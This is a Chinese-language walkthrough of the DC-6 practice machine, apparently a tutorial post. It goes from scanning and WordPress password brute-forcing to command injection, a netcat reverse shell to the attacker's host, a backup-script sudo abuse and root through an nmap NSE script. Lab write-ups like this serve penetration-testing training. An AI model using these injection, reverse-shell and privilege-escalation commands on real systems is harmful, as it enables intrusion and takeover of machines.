DC-6靶机复现
字数 940 2025-09-01 11:26:10

DC-6靶机渗透测试详细教学文档

信息收集阶段

1. 目标发现

  • 使用ARP扫描发现目标IP: 
    arp-scan -l
    发现目标IP为192.168.130.146

2. 端口扫描

  • 使用nmap扫描开放端口和服务: 
    nmap 192.168.130.146
    发现开放了:
    • 22端口:SSH服务
    • 80端口:Web服务

3. SSH暴力破解尝试

  • 尝试使用nmap脚本爆破SSH: 
    nmap --script=ssh-brute 192.168.130.146
    爆破失败,放弃此路径

4. Web服务侦察

  • 发现无法直接访问Web服务,URL栏显示"wordy"
  • 修改hosts文件: 
    vi /etc/hosts
    添加: 
    192.168.130.146 wordy

5. 目录扫描

  • 使用dirsearch扫描Web目录: 
    dirsearch -u http://wordy
    发现登录入口,但缺少凭证

6. WordPress用户枚举

  • 使用wpscan枚举用户: 
    wpscan --url http://wordy -e u
    获取用户列表:admin、graham、sarah、mark、jens

7. 密码爆破

  • 解压密码字典: 
    gzip -dk /usr/share/wordlists/rockyou.txt.gz
  • 根据提示筛选包含"k01"的密码: 
    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
  • 使用wpscan爆破: 
    wpscan --url http://wordy -U user.txt -P passwords.txt
    成功获取凭证:mark/helpdesk01

初始访问

1. Web登录

  • 使用凭证mark/helpdesk01登录WordPress后台

2. 命令注入漏洞利用

  • 发现IP转换功能存在命令注入点
  • 测试命令注入: 
    1.1 | whoami
    确认可执行命令

3. 反弹Shell

  • 开启监听: 
    nc -lvnp 8888
  • 通过Burp Suite发送反弹命令(因输入长度限制): 
    1.1 | nc 192.168.130.128 8888 -e /bin/sh
  • 升级为交互式Shell: 
    python -c 'import pty;pty.spawn("/bin/bash")'

权限提升

1. 横向移动至graham用户

  • 在mark目录发现graham的密码: 
    graham - GSo7isUM1D4
  • 切换用户: 
    su graham

2. 检查sudo权限

sudo -l

发现可以无密码以jens用户执行/home/jens/backups.sh

3. 利用备份脚本提权

  • 查看备份脚本内容: 
    cat /home/jens/backups.sh
  • 尝试注入命令: 
    echo '/bin/bash' >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
    成功切换到jens用户

4. 最终提权至root

  • 检查jens的sudo权限: 
    sudo -l
    发现可以以root身份执行nmap
  • 创建nmap脚本提权: 
    echo 'os.execute("/bin/sh")' > getshell.nse
sudo nmap --script=getshell.nse
    成功获取root权限

获取flag

  • 查找flag文件: 
    find / -name *flag*
  • 查看flag内容: 
    cat /root/theflag.txt

总结

本渗透测试过程涉及:

  1. 信息收集(ARP扫描、端口扫描、目录枚举)
  2. 凭证爆破(用户枚举、密码爆破)
  3. Web漏洞利用(命令注入)
  4. 权限提升(横向移动、sudo滥用、nmap提权)

关键点:

  • 注意靶机提示(密码包含k01)
  • 命令注入时注意长度限制
  • 仔细检查每个用户的sudo权限
  • 灵活利用各种工具的特性进行提权
DC-6靶机渗透测试详细教学文档 信息收集阶段 1. 目标发现 使用ARP扫描发现目标IP: 发现目标IP为 192.168.130.146 2. 端口扫描 使用nmap扫描开放端口和服务: 发现开放了: 22端口:SSH服务 80端口:Web服务 3. SSH暴力破解尝试 尝试使用nmap脚本爆破SSH: 爆破失败,放弃此路径 4. Web服务侦察 发现无法直接访问Web服务,URL栏显示"wordy" 修改hosts文件: 添加: 5. 目录扫描 使用dirsearch扫描Web目录: 发现登录入口,但缺少凭证 6. WordPress用户枚举 使用wpscan枚举用户: 获取用户列表:admin、graham、sarah、mark、jens 7. 密码爆破 解压密码字典: 根据提示筛选包含"k01"的密码: 使用wpscan爆破: 成功获取凭证:mark/helpdesk01 初始访问 1. Web登录 使用凭证mark/helpdesk01登录WordPress后台 2. 命令注入漏洞利用 发现IP转换功能存在命令注入点 测试命令注入: 确认可执行命令 3. 反弹Shell 开启监听: 通过Burp Suite发送反弹命令(因输入长度限制): 升级为交互式Shell: 权限提升 1. 横向移动至graham用户 在mark目录发现graham的密码: 切换用户: 2. 检查sudo权限 发现可以无密码以jens用户执行 /home/jens/backups.sh 3. 利用备份脚本提权 查看备份脚本内容: 尝试注入命令: 成功切换到jens用户 4. 最终提权至root 检查jens的sudo权限: 发现可以以root身份执行nmap 创建nmap脚本提权: 成功获取root权限 获取flag 查找flag文件: 查看flag内容: 总结 本渗透测试过程涉及: 信息收集(ARP扫描、端口扫描、目录枚举) 凭证爆破(用户枚举、密码爆破) Web漏洞利用(命令注入) 权限提升(横向移动、sudo滥用、nmap提权) 关键点: 注意靶机提示(密码包含k01) 命令注入时注意长度限制 仔细检查每个用户的sudo权限 灵活利用各种工具的特性进行提权